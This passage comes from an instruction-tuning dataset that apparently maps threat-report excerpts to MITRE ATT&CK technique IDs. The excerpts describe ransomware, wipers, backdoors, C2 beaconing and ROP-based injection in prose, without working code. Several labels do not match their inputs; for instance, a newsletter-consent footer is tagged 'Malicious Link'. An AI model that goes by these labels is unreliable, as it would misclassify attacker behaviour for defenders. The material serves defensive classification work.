ATT&CK techniques as a list of technique IDs with their names.", + "input": "This section describes how we identified additional Stealth Falcon victims and bait content, and traced Stealth Falcon\u2019s spyware to additional C2 servers", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. The stager will be described in more detail in the next section", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections", + "output": "- T1070.005: Indicator Removal - Network Share Connection Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware then allows the user to open the file as normal without any indication to the user that anything has occurred", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims\u2019 networks", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named \u201cWinnti", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A malware variant named Mal/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PsExec is then used to launch PowerShell which uses the win32_service WMI class to retrieve services and the net stop command to stop these services. After Windows Defender is disabled and services have been stopped across the organization, PsExec is used to launch the WastedLocker ransomware itself, which then begins encrypting data and deleting shadow volumes", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1007: System Service Discovery\n- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The file named \u2018lsass.exe\u2019 was downloaded from win10-update[.]com via an HTTP request. The win10-update[.]com domain has been noted in open source as an indicator associated with Chafer threat operations. The lsass.exe file downloaded from this domain is a previously unreported python-based payload that we are currently tracking as MechaFlounder. We believe Chafer uses MechaFlounder as a secondary payload that the group downloads from a first-stage payload to carry out its post-exploitation activities on the compromised host", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the attackers need to send a file or command to the victim machine, they place them to the folder named d in the victim\u2019s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data. In Windows, Chrome cookies and saved passwords are encrypted using DPAPI", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This time, the text is from the novel \"\"The Brothers Karamazov\"\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. Secondly, the author split the malware in a couple of different files. For example, the variables are stored in a \"\"Constant.py\"\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files\"", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download", + "output": "- T1197: BITS Jobs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 - Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns - Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns - The techniques, tactics and procedures align with Lazarus group\u2019s interest in crypto currency theft", + "output": "- T1001.003: Data Obfuscation - Protocol Impersonation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Check the email sender, subject, and body for anything suspicious before downloading and opening email attachments. Check the file extension of the attached file and make sure it is the intended file format. Avoid activating macro for any attached Microsoft Office files, especially for emails that request macro activation using an image of the body of the opened file or those that don\u2019t show anything. Subtle changes to a popular URL can be one indicator of malicious content", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Checks if the user has Administrator privilege 2) Drops the Cobalt Strike Stager in debug or \u201c%TEMP%\u201d directory as \u201ctmp_FlVnNI.dat\u201d depending on the user privilege 3) Opens the decoy Word document 4) Locates the InstallUtil.exe and its installed version 5) Copies \u201cschtasks.exe\u201d to \u201c%TEMP%\u201d directory and renames it to \u201cwtask.exe\u201d 6) Creates Scheduled tasks with the name \u201cSecurity Script kb00855787\u201d 7) Renames \u201cwscript.exe\u201d into \u201cwinwsh.exe\u201d 8) Runs the scheduled task to execute the Cobalt Strike Stager 9) C2 communication", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are", + "output": "- T1030: Data Transfer Size Limits\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Update the RAT and Keylogger remotely - Set an autostart JavaScript to run on RAT startup - A Domain Generation Algorithm (DGA) for C2 resiliency - If the user has admin permissions, it deletes shadow copies using vssadmin.exe", + "output": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The wiper is relatively small in size and dynamically resolves most of the APIs it uses. Before starting any file destruction, it checks to ensure that the machine is not a domain controller. If the machine is a domain controller, it stops execution. Pseudo-code: CaddyWiper checking for the Domain Controller role of the machine. If the system is not a domain controller, the wiper will destroy files on \"\"C:\\Users,\"\" followed by wiping of all files in the next drive letter until it reaches the \"\"Z\"\" drive. This means that the wiper will also attempt to wipe any network mapped drive attached to the system\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. The downloader will use the filename of the script (ex", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Summary . The following knowledgebase will explain the uses of Net commands in Windows Operating Systems. More information . Net Commands On Windows Operating Systems . The following Net Commands can be used to perform operations on Groups, users, account policies, shares, and so on. NET . The \"\"Net Accounts\"\" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. When you type Net Accounts, you will see the default settings of the Account Lockout policy and Password Policy in local computer show as: The above settings displayed as per the role of the computer. Community Solutions Content Disclaimer . Microsoft corporation and/or its respective suppliers make no representations about the suitability, reliability, or accuracy of the information and related graphics contained herein. User Account Control and remote restrictions - Windows Server Describes User Account Control (UAC) and remote restrictions in Windows Vista. auditpol get Reference article for the auditpol get command, which retrieves the system policy, per-user policy, auditing options, and audit security descriptor object. wevtutil Reference article for wevtutil, which lets you retrieve information about event logs and publishers. Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - \u00a9 Microsoft 2022 - Summary - More information - - - - Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - \u00a9 Microsoft 2022\"", + "output": "- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Email* - - * I agree to provide my email address to \u201cAO Kaspersky Lab\u201d to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the \u201cunsubscribe\u201d link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. I agree to provide my email address to \u201cAO Kaspersky Lab\u201d to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the \u201cunsubscribe\u201d link that I find at the bottom of any e-mail sent to me for the purposes mentioned above", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. When opening the document, the user must click on the \"\"Enable content\"\" button, which enables macros (fig. 5 Example of an email message with a Word document, which, when opened, requires the user to click on the \"\"Enable content\"\" button to enable a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. In addition, Cobalt Strike enables users not to expose a fragment of memory allocated in the context of another process, the RWX (Read, Write, Execute) attributes, which often reveal injected code\"", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recently, after looking at the difference between 0vercl0ck\u2019s proof of concept and the real deal, a friend asked me \u201cWhy does PowerLoader go to all the trouble of using ROP chains instead of just executing the shellcode like 0vercl0ck does. PowerLoader gets the malicious code into the process by opening an existing, shared section already mapped into explorer, removing the need to allocate heap space or overwrite process memory. By opening \u201cShell_TrayWnd\u201d and calling SetWindowLong, PowerLoader is able to set a variable used by the window procedure to point to a specific address in its shellcode. The read part won\u2019t trigger DEP (Data Execution Prevention), if the section is not executable (in later versions of windows it is execute-protected), however if EAX points to an address inside the section, DEP will be triggered. Well how does one get from KiUserApcDispatcher to code execution, without executing the non-executable shellcode, I hear you ask. Next it pops the return address into the EAX and then calls it, this results in execution being transferred back to the Window Procedure. The sequences are instruction within the executable regions of explorer\u2019s memory, their purpose is to perform certain operations as PowerLoader can\u2019t execute any of its own code yet, due to the section being execute-protected. 00100E28 points to some code in explorer that executes the instruction \u201cSTD\u201d followed by \u201cRET\u201d, As a result the instruction underlined in red will result in the direction flag being set and execution being returned to the Window Procedure. Well these bytes were found, in this case inside some random shell32 function (it doesn\u2019t matter). Now the pointer doesn\u2019t point to the start of the function, it points somewhere in the middle, as a result, only the bytes in the red box are executed. Remember: because all addresses points to executable code within explorer address space, and they are called using a pointer, no code in the shellcode is actually executed, thus resulting in no nasty DEP errors", + "output": "- T1055.011: Process Injection - Extra Window Memory Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004", + "output": "- T1569.001: System Services - Launchctl" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Researchers also observed that the backdoor downloads and executes the Cobalt Strike pentesting and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold\u00a0in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stop the running xmlprov service - Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory - Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe - Modify the xmlProv service values including type and binpath - Add xmlProv to the list of the services to be loaded by svchost - add xmlProv to the xmlProv registry key - Start the xmlProv service", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this campaign, Earth Vetala threat actors used spearphishing emails and lure documents against 